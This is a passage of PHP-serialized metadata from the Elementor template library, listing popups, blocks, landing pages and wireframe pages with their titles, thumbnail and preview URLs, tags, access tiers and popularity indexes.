Psychologist\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/PopUp.png\";s:12:\"tmpl_created\";i:1600170487;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:578;s:11:\"trend_index\";i:312;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:174;a:20:{s:4:\"tmpl\";i:899;s:2:\"id\";i:11839;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Header_small.png\";s:12:\"tmpl_created\";i:1569430015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"creative portfolio\",\"header\",\"portfolio\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:189;s:11:\"trend_index\";i:20;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:175;a:20:{s:4:\"tmpl\";i:1433;s:2:\"id\";i:24477;s:5:\"title\";s:27:\"Wireframe &#8211; Gallery 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Gallery-2.jpg\";s:12:\"tmpl_created\";i:1653988835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-gallery-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"Business\",\"Contact\",\"Design\",\"Footer\",\"Gallery\",\"Header\",\"Portfolio\",\"Services\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:176;a:20:{s:4:\"tmpl\";i:1205;s:2:\"id\";i:20233;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633881371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:177;a:20:{s:4:\"tmpl\";i:1214;s:2:\"id\";i:20539;s:5:\"title\";s:31:\"Design Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/10/Design-Blog-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/design-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:47:\"[\"Blog\",\"Coming Soon\",\"Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:178;a:20:{s:4:\"tmpl\";i:1224;s:2:\"id\";i:21013;s:5:\"title\";s:24:\"Restaurant &#8211; About\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/12/7-About-Restaurant.jpg\";s:12:\"tmpl_created\";i:1638795588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:36:\"[\"About\",\"Chef\",\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:179;a:20:{s:4:\"tmpl\";i:992;s:2:\"id\";i:13402;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/04/Popup-Course-Completed.jpg\";s:12:\"tmpl_created\";i:1587474772;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:619;s:11:\"trend_index\";i:582;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:180;a:20:{s:4:\"tmpl\";i:1206;s:2:\"id\";i:20254;s:5:\"title\";s:41:\"Digital Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Digital-Marketing-Agency-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/digital-marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:65:\"[\"Agency\",\"Business\",\"Digital Agency\",\"Landing Pages\",\"Services\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:181;a:20:{s:4:\"tmpl\";i:1235;s:2:\"id\";i:21281;s:5:\"title\";s:25:\"Law Firm &#8211; Services\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/16-Services-Law-firm.jpg\";s:12:\"tmpl_created\";i:1638819128;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/law-firm-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Consulting\",\"Law\",\"Law Firm\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:182;a:20:{s:4:\"tmpl\";i:1017;s:2:\"id\";i:14111;s:5:\"title\";s:36:\"Classic | Japanese restaurant | Sale\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1592300400;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-japanese-restaurant-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:717;s:11:\"trend_index\";i:697;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:183;a:20:{s:4:\"tmpl\";i:1213;s:2:\"id\";i:20509;s:5:\"title\";s:40:\"Dogs Adoption &#8211; Social Involvement\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/10/Dog-Adoption-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/dogs-adoption-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:49:\"[\"Adoption\",\"Involvement\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:184;a:20:{s:4:\"tmpl\";i:1233;s:2:\"id\";i:21205;s:5:\"title\";s:29:\"Photographer &#8211; Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/25-Projects-Photographer.jpg\";s:12:\"tmpl_created\";i:1638818372;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/photographer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Black and white\",\"Photography\",\"Project\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:185;a:20:{s:4:\"tmpl\";i:993;s:2:\"id\";i:13422;s:5:\"title\";s:30:\"Classic | Menu | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1587474782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-menu-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:516;s:11:\"trend_index\";i:432;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:186;a:20:{s:4:\"tmpl\";i:925;s:2:\"id\";i:12540;s:5:\"title\";s:33:\"Classic | Menu | Travel and tours\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_Menu_s.png\";s:12:\"tmpl_created\";i:1575960267;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-menu-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:690;s:11:\"trend_index\";i:714;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:187;a:20:{s:4:\"tmpl\";i:1208;s:2:\"id\";i:20361;s:5:\"title\";s:51:\"Exercise &#038; Fitness Equipment &#8211; eCommerce\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2021/10/Exercise-Fitness-Equipment-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633883766;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/lp/exercise-fitness-equipment-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Fitness\",\"Health\",\"Landing Pages\",\"Online Shop\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:188;a:20:{s:4:\"tmpl\";i:1239;s:2:\"id\";i:21373;s:5:\"title\";s:28:\"Photographer &#8211; Gallery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/18-Gallery-Photographer.jpg\";s:12:\"tmpl_created\";i:1638821177;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/photographer-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Gallery\",\"Photography\",\"Portfolio\",\"Project\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:189;a:20:{s:4:\"tmpl\";i:1426;s:2:\"id\";i:24348;s:5:\"title\";s:24:\"Wireframe &#8211; Home 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-2.jpg\";s:12:\"tmpl_created\";i:1653988444;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:190;a:20:{s:4:\"tmpl\";i:958;s:2:\"id\";i:13129;s:5:\"title\";s:28:\"Classic | Menu | Photography\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/02/PopUp_s.png\";s:12:\"tmpl_created\";i:1582092645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-menu-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:646;s:11:\"trend_index\";i:521;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:191;a:20:{s:4:\"tmpl\";i:1427;s:2:\"id\";i:24366;s:5:\"title\";s:24:\"Wireframe &#8211; Home 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-3.jpg\";s:12:\"tmpl_created\";i:1653988491;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:192;a:20:{s:4:\"tmpl\";i:1207;s:2:\"id\";i:20299;s:5:\"title\";s:51:\"Interior Design Consultation &#8211; Online Service\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2021/10/Interior-Design-Consultation-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/lp/interior-design-consultation-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:65:\"[\"Consulting\",\"Interior Design\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:193;a:20:{s:4:\"tmpl\";i:952;s:2:\"id\";i:12726;s:5:\"title\";s:52:\"Classic | Newsletter | Subscribe | Magazine and Blog\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_Newsletter_s.png\";s:12:\"tmpl_created\";i:1579061019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/classic-newsletter-subscribe-magazine-and-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:357;s:11:\"trend_index\";i:281;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:194;a:20:{s:4:\"tmpl\";i:883;s:2:\"id\";i:11468;s:5:\"title\";s:20:\"Classic | Sale | Gym\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/08/PopUp_Small.png\";s:12:\"tmpl_created\";i:1567393182;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/classic-sale-gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:696;s:11:\"trend_index\";i:740;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:195;a:20:{s:4:\"tmpl\";i:1216;s:2:\"id\";i:20623;s:5:\"title\";s:57:\"Luxurious Camping Accommodation For Events &#8211; Events\";s:9:\"thumbnail\";s:113:\"https://library.elementor.com/wp-content/uploads/2021/10/Luxurious-Camping-Accommodation-For-Events-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634041681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:151:\"https://library.elementor.com/lp/luxurious-camping-accommodation-for-events-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:43:\"[\"Event\",\"Events\",\"Landing Pages\",\"Travel\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:196;a:20:{s:4:\"tmpl\";i:1219;s:2:\"id\";i:20886;s:5:\"title\";s:28:\"Online Training &#8211; Home\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/12/2-Home-Online-Training.jpg\";s:12:\"tmpl_created\";i:1638784769;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/online-training-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Fitness\",\"Online\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:197;a:20:{s:4:\"tmpl\";i:1065;s:2:\"id\";i:15570;s:5:\"title\";s:33:\"Classic | Subscribe | Travel Blog\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp.jpg\";s:12:\"tmpl_created\";i:1606215555;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscribe-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:709;s:11:\"trend_index\";i:459;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:198;a:20:{s:4:\"tmpl\";i:1431;s:2:\"id\";i:24437;s:5:\"title\";s:25:\"Wireframe &#8211; About 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-4.jpg\";s:12:\"tmpl_created\";i:1653988733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:74:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:199;a:20:{s:4:\"tmpl\";i:1210;s:2:\"id\";i:20414;s:5:\"title\";s:45:\"Online English Courses &#8211; Online Service\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Online-English-Courses-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/online-english-courses-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:50:\"[\"Course Online\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:200;a:20:{s:4:\"tmpl\";i:1132;s:2:\"id\";i:16553;s:5:\"title\";s:31:\"Fly-In | Contact | Beauty Salon\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/12/PopUp.jpg\";s:12:\"tmpl_created\";i:1608622602;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-contact-beauty-salon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:691;s:11:\"trend_index\";i:428;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:201;a:20:{s:4:\"tmpl\";i:1441;s:2:\"id\";i:24574;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 